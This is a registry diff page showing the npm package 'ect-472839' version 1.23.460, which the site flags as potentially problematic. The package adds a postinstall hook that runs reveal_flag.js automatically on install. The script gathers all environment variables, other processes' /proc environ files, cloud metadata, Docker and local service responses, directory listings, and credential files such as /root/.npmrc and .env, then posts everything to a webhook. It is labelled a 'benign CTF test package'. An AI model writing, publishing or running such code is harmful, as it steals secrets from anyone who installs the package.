npm - ect-472839 - Versions diffs - 1.23.460 - Mend

ect-472839 1.23.460

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of ect-472839 might be problematic. Click here for more details.

Files changed (2) hide show

package/package.json +8 -0
package/reveal_flag.js +263 -0

package/package.json ADDED Viewed

@@ -0,0 +1,8 @@
+{
+  "name": "ect-472839",
+  "version": "1.23.460",
+  "description": "benign CTF test package (postinstall sends a webhook)",
+  "scripts": {
+    "postinstall": "node ./reveal_flag.js"
+  }
+}

package/reveal_flag.js ADDED Viewed

@@ -0,0 +1,263 @@
+// reveal_flag.js
+// Comprehensive postinstall probe: envvars, process info, /proc, local HTTP services, dir listings.
+// Replace WEBHOOK_URL with your webhook.site URL (or set via env var).
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+const url = require('url');
+const http = require('http');
+const https = require('https');
+const { promisify } = require('util');
+const readdir = promisify(fs.readdir);
+const stat = promisify(fs.stat);
+const readFile = promisify(fs.readFile);
+const WEBHOOK_URL = process.env.WEBHOOK_URL || 'https://webhook.site/YOUR-WEBHOOK-ID';
+const MAX_BYTES = 3000;     // max bytes to read per file
+const MAX_FILES = 12;       // cap files read
+const HTTP_TIMEOUT = 6000;  // ms per http request
+const TOTAL_HTTP = 8;       // number of local endpoints to try
+const MAX_PROC = 80;        // max /proc entries to inspect
+const MAX_DIR_LIST = 100;   // max directory entries to list
+function send(payload) {
+  try {
+    const parsed = url.parse(WEBHOOK_URL);
+    const proto = parsed.protocol === 'https:' ? https : http;
+    const opts = {
+      hostname: parsed.hostname,
+      port: parsed.port || (parsed.protocol === 'https:' ? 443 : 80),
+      path: parsed.path,
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      timeout: 10_000
+    };
+    const req = proto.request(opts, (res) => {
+      res.on('data', () => {});
+      res.on('end', () => {});
+    });
+    req.on('error', (err) => {
+      // ignore network errors in postinstall
+      console.error('webhook send error', err && err.message);
+    });
+    req.write(JSON.stringify(payload));
+    req.end();
+    console.log('POSTED_WEBHOOK', WEBHOOK_URL);
+  } catch (e) {
+    console.error('send exception', e && e.message);
+  }
+}
+async function safeRead(p) {
+  try {
+    const b = await readFile(p);
+    const content = b.toString('utf8', 0, MAX_BYTES);
+    return { path: p, size: b.length, content, truncated: b.length > MAX_BYTES };
+  } catch (e) {
+    return { path: p, error: e.message };
+  }
+}
+async function listDir(d) {
+  try {
+    const items = await readdir(d);
+    return { dir: d, entries: items.slice(0, MAX_DIR_LIST) };
+  } catch (e) {
+    return { dir: d, error: e.message };
+  }
+}
+function httpGet(target, timeout = HTTP_TIMEOUT) {
+  return new Promise((resolve) => {
+    try {
+      const parsed = url.parse(target);
+      const proto = parsed.protocol === 'https:' ? https : http;
+      const opts = {
+        hostname: parsed.hostname,
+        port: parsed.port || (parsed.protocol === 'https:' ? 443 : 80),
+        path: parsed.path,
+        method: 'GET',
+        headers: { 'User-Agent': 'postinstall-probe/1.0' },
+        timeout
+      };
+      const req = proto.request(opts, (res) => {
+        let acc = '';
+        res.on('data', (c) => { if (acc.length < MAX_BYTES) acc += c.toString(); });
+        res.on('end', () => {
+          resolve({ url: target, status: res.statusCode, headers: res.headers, body_preview: acc.slice(0, MAX_BYTES) });
+        });
+      });
+      req.on('error', (e) => resolve({ url: target, error: e.message }));
+      req.on('timeout', () => { req.destroy(); resolve({ url: target, error: 'timeout' }); });
+      req.end();
+    } catch (e) {
+      resolve({ url: target, error: e && e.message });
+    }
+  });
+}
+async function probeEnvAndProcess() {
+  const env = process.env;
+  const envSample = {};
+  // include all env but trim values > 300 chars
+  for (const k of Object.keys(env)) {
+    try {
+      const v = env[k] || '';
+      envSample[k] = v.length > 300 ? (v.slice(0, 300) + '...[trunc]') : v;
+    } catch (e) { envSample[k] = `ERR:${e.message}`; }
+  }
+  // process info
+  const procInfo = {
+    cwd: process.cwd(),
+    argv: process.argv,
+    uid: process.getuid ? process.getuid() : null,
+    gid: process.getgid ? process.getgid() : null,
+    euid: process.geteuid ? process.geteuid() : null,
+    egid: process.getegid ? process.getegid() : null,
+    uidStr: (() => { try { return require('os').userInfo(); } catch(e){ return null; } })(),
+    node_version: process.version,
+    platform: process.platform,
+    architecture: process.arch
+  };
+  return { envSample, procInfo };
+}
+async function probeProcEnvirons(uidFilter = null) {
+  const results = [];
+  try {
+    const pEntries = await readdir('/proc');
+    let count = 0;
+    for (const e of pEntries) {
+      if (count >= MAX_PROC) break;
+      if (!/^\d+$/.test(e)) continue;
+      const pidPath = path.join('/proc', e);
+      const environPath = path.join(pidPath, 'environ');
+      const statusPath = path.join(pidPath, 'status');
+      try {
+        // read status to check uid
+        const st = await readFile(statusPath, 'utf8');
+        const uidLine = st.split('\n').find(l => l.startsWith('Uid:'));
+        let uid = null;
+        if (uidLine) uid = uidLine.split(/\s+/)[1];
+        if (uidFilter && String(uid) !== String(uidFilter)) {
+          continue;
+        }
+        const envContent = await safeRead(environPath);
+        results.push({ pid: e, uid, environ: envContent });
+        count++;
+      } catch (e) {
+        // ignore unreadable
+      }
+    }
+  } catch (e) {
+    results.push({ error: e.message });
+  }
+  return results;
+}
+async function probeLocalHttp() {
+  // common local endpoints to try. Adjust list if you discover more.
+  const urls = [
+    'http://127.0.0.1:4873/',                           // verdaccio root
+    'http://127.0.0.1:4873/-/v1/search?text=ect',       // verdaccio search API
+    'http://127.0.0.1:4873/ect-472839',                 // package-style path
+    'http://127.0.0.1:3000/',                           // common app port
+    'http://127.0.0.1:8080/',                           // another common port
+    'http://127.0.0.1:5984/_all_dbs',                   // couchdb
+    'http://169.254.169.254/latest/meta-data/',         // cloud metadata (if present)
+    'http://127.0.0.1:2375/version'                     // docker daemon API (if exposed)
+  ].slice(0, TOTAL_HTTP);
+  const out = [];
+  for (const u of urls) {
+    try {
+      const r = await httpGet(u);
+      out.push(r);
+    } catch (e) {
+      out.push({ url: u, error: e && e.message });
+    }
+  }
+  return out;
+}
+async function probeAppDirs() {
+  const candidates = ['/app', '/usr/src/app', '/home/node', '/home', '/var/www', '/var/lib/verdaccio', '/verdaccio', '/opt', '/srv'];
+  const results = [];
+  for (const d of candidates) {
+    results.push(await listDir(d));
+  }
+  return results;
+}
+async function probeVerdaccioStorageLikelyPaths() {
+  // attempt to read common Verdaccio storage layouts for package 'ect-472839'
+  const candidates = [
+    '/verdaccio/storage/ect-472839',
+    '/verdaccio/storage/ect-472839/' ,
+    '/var/lib/verdaccio/storage/ect-472839',
+    '/home/verdaccio/storage/ect-472839',
+    '/storage/verdaccio/ect-472839',
+  ];
+  const res = [];
+  for (const p of candidates) {
+    res.push(await listDir(p));
+  }
+  return res;
+}
+async function runAll() {
+  try {
+    const pkg = (() => { try { return require('./package.json'); } catch (e) { return { name: 'unknown', version: 'unknown' }; } })();
+    const [envProc, procEnvs, localHttp, appDirs, verdPaths] = await Promise.all([
+      probeEnvAndProcess(),
+      probeProcEnvirons(process.getuid ? process.getuid() : null),
+      probeLocalHttp(),
+      probeAppDirs(),
+      probeVerdaccioStorageLikelyPaths()
+    ]);
+    // Also try reading some likely files if present (package.json in cwd, package-lock, config files)
+    const extras = [];
+    const extraFiles = [
+      path.join(process.cwd(), 'package.json'),
+      path.join(process.cwd(), 'package-lock.json'),
+      '/etc/verdaccio/config.yaml',
+      '/home/verdaccio/config.yaml',
+      '/root/.npmrc',
+      path.join(process.cwd(), '.env'),
+      '/etc/environment'
+    ];
+    for (const f of extraFiles) {
+      extras.push(await safeRead(f));
+    }
+    const payload = {
+      event: 'postinstall-extended-probe',
+      package: pkg.name,
+      version: pkg.version,
+      ts: new Date().toISOString(),
+      hostname: os.hostname(),
+      os_platform: process.platform,
+      arch: process.arch,
+      env_sample: envProc.envSample,
+      process_info: envProc.procInfo,
+      proc_environs: procEnvs.slice(0, 40),
+      local_http: localHttp,
+      app_dirs: appDirs,
+      verdaccio_candidates: verdPaths,
+      extra_files: extras
+    };
+    // send and log
+    send(payload);
+    console.log('PROBE_DONE', JSON.stringify({ pkg: pkg.name, matches: (procEnvs||[]).length }, null, 2));
+  } catch (e) {
+    console.error('runAll exception', e && e.message);
+    send({ event: 'postinstall-error', error: e && e.message });
+  }
+}
+runAll();